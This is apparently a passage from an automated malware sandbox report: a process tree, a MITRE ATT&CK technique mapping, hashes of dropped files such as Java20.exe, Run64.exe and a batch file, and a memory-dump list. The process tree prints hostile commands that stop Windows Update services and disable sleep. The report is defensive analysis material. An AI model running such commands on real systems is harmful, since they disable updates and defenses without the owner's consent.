  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:768
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2348
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:2328
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:4496
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  PID:5020
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  PID:5012
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  PID:1868
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  PID:4092
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:1976
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  - Modifies data under HKEY_USERS
  PID:3292

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:2160

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
5d574dc518025fad52b7886c1bff0e13

SHA1
68217a5f9e9a64ca8fed9eefa4171786a8f9f8f7

SHA256
755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2

SHA512
21de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4208a5d75079eb99d2ee6c9a15c05376

SHA1
923279a172c5cf94bf1f1572083ad77d7e6fb30c

SHA256
55e19e147f67e75a80cd65402acbf094767dd548040a208bdd98118ebaac5718

SHA512
31c2913874057b8ac365d0fcdee4e08fdebc0c6cd6a45d694918229293999caa83875e06fa75090f3c77f2fe7e8e6061642dc3429b0a00fbd78b6f0a4b4b375e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2f8d094cb93065cc896475a94806bb70

SHA1
0c9ba776402cbde67fa3cafa95f1b94b67889556

SHA256
ff4c9715cb8f7cb3b5886ebded1588db5d5b6e53c22950450e53cb9f23c049bd

SHA512
db6146206aa62cfeb0f282fdfed0f83a65c1522bba7dd59ee2160f25ad6aa107266ba75c606b98a06abd28fc2de131134fe97f307e32a576ee4eef89d1dd9f09

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fb20b5b3b49e649b039265e7e766874d

SHA1
9c20c223bc73cbc795d4e5015c1664b724a93e04

SHA256
fbe1ba0cc4f486c2dfb07c8621267b662de2acfce5c0d81bef742c3456c1b3d8

SHA512
7526da24100ac119898fcb2615a0edbd76596169328bf5f38a9d45755083e95b5a925bd690921f97cdb76783ec144d276c320201935a80b1738296ebec1dd7ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
601d047c01a1bb6f5ee3d239ea28f1da

SHA1
5904962c2c282be1aaa487db74d913072025d6b1

SHA256
7772d15605ce69d7be3e0351fedb3748f00268af26be143878aeb23794c2b6f4

SHA512
ae771466b9325cf5a860d520300ddb1b48d1bbfd4eb6566a3bc1e67e44e708bf9c5b2c1517938d08a4455a2b5b2a1f5a271ba6904d54eaf12be8a46b01a5b11c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
16a47f226ff4bb2ab7ea53d8c37705ea

SHA1
610daff97dca19e727518db5f21bcad79563e86c

SHA256
2679027d0e3875f665efb399f0948356a3cea90e61bfed63c6de4d66d7c60f1c

SHA512
c2f09862f72d872ab5a29d728876aeaa76563349f10669013aa17ee5a2aacfa735d4e5c3b072d30f3a9585ba833a328ecf45611fc8715a27b2bec8a7e51596c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cache.rar

Filesize
2.3MB

MD5
8d81c24c788d3b677ae69bb05b332ca3

SHA1
4c22763de908a474c072f6be63f9f4b739677b6b

SHA256
5dff0b0233de8fc9e1e4d2acca3bf31356b6ad5e391a19d83b25ffde35368033

SHA512
234e56f23a47e01b6ed16bb448e0c418908d929c2c4f02802ba5ef7fdca248db465932f2e42e695199c61156b12378340f51f4a9bcb7360dee45915cce52e115

Download Submit
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe

Filesize
333KB

MD5
c4d99bebc185a005d42c1554467adb20

SHA1
735b6e7dcbaa96d4059918a864d26afa7d15f221

SHA256
05b97b1a01c860431abc0ad0cc3b808a2ab281fee02926d45ceda01adbd9bef6

SHA512
60b23492ce15bc0b73455dbe4e47d7b4ec3fafe8bd53817b3f35114ab0b201e4ef9bed16f35045dcb430535ae07f867fe53ffd4a93c5fbf47567107c7f44c2bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe

Filesize
2.6MB

MD5
771ebc5437983534ab8ff6b091cf2ded

SHA1
8581e29460d5909ccff01bdad4ab106431c89eeb

SHA256
53eb1f650b78da51f4d24a5185d4e64c415951923acc9850bb946ee5ab374bf8

SHA512
ae441d38be3718b25ce79eaabecab5137b952888c7b983e86b7c620c87508259eb74b1c7c7dd44fe2c5e36404b2460a26e8e8c3e74d388eb5f7d4ebc45920bb9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0i3nlhmq.kp2.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\kdotlbBcbF.bat

Filesize
172B

MD5
9c91ca84f03b82d8f45c9acb3c4462e3

SHA1
66a5576da8235a70da4b6367edf65e1613ed718d

SHA256
e719a3d2cdd5209c88d09de833d492ab5472f8903255dc1e1c21265c7375f1b9

SHA512
f8d2429a3a068bed6ce4084266690e18c59bba92131ded1987b3ce963a06ea30f23a74d70ebcfd3ae3a805728ae8db01fc843910ce60e2cdb63d83900943535a

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
4KB

MD5
747d7ddd27f695f5e07df8ff9bc44e28

SHA1
c33048412255744c3de6292238eae196791be25e

SHA256
8dac7d9b38f2811c76652717c7f93c2a6390f031149ed850ae9ddb7dedcfca55

SHA512
ca85efa05980bba8ced81cb41a66e05821a2a55382142bffd27e8945a34d0ec89a6e221f0f5e381c877adc8d639863c9c837b74401f8096af5e9417580766ffa

Download Submit
memory/304-268-0x0000020B49540000-0x0000020B49562000-memory.dmp

Filesize
136KB

Download
memory/304-249-0x0000020B49540000-0x0000020B4956A000-memory.dmp

Filesize
168KB

Download
memory/952-366-0x0000000000810000-0x0000000000811000-memory.dmp

Filesize
4KB

Download
memory/952-368-0x0000000000810000-0x0000000000811000-memory.dmp

Filesize
4KB

Download
memory/1832-447-0x0000021D70110000-0x0000021D701C9000-memory.dmp

Filesize
740KB

Download
memory/1832-441-0x0000021D6FF50000-0x0000021D6FF6C000-memory.dmp

Filesize
112KB

Download
memory/1832-480-0x0000021D6FF70000-0x0000021D6FF7A000-memory.dmp

Filesize
40KB

Download
memory/1976-571-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/1976-573-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/1976-574-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/1976-575-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/1976-578-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/1976-572-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/3292-589-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3292-587-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3292-599-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3292-598-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3292-597-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3292-579-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3292-580-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3292-582-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3292-585-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3292-590-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3292-596-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3292-591-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3292-588-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3292-595-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3292-581-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3292-586-0x000001A6E4AE0000-0x000001A6E4B00000-memory.dmp

Filesize
128KB

Download
memory/3292-583-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3292-584-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4572-53-0x00007FFE426F0000-0x00007FFE430DC000-memory.dmp

Filesize
9.9MB

Download
memory/4572-72-0x00007FFE426F0000-0x00007FFE430DC000-memory.dmp

Filesize
9.9MB

Download
memory/4572-47-0x00007FFE426F3000-0x00007FFE426F4000-memory.dmp

Filesize
4KB

Download
memory/4572-49-0x000002E71A860000-0x000002E71A882000-memory.dmp

Filesize
136KB

Download
memory/4572-68-0x00007FFE426F0000-0x00007FFE430DC000-memory.dmp

Filesize
9.9MB

Download
memory/4572-52-0x000002E71AA10000-0x000002E71AA86000-memory.dmp

Filesize
472KB

Download
memory/4604-369-0x0000000005BF0000-0x0000000005C82000-memory.dmp

Filesize
584KB

Download
memory/4604-367-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/4604-376-0x0000000005E00000-0x0000000005E66000-memory.dmp

Filesize
408KB

Download
memory/4604-422-0x0000000007530000-0x0000000007A2E000-memory.dmp

Filesize
5.0MB

Download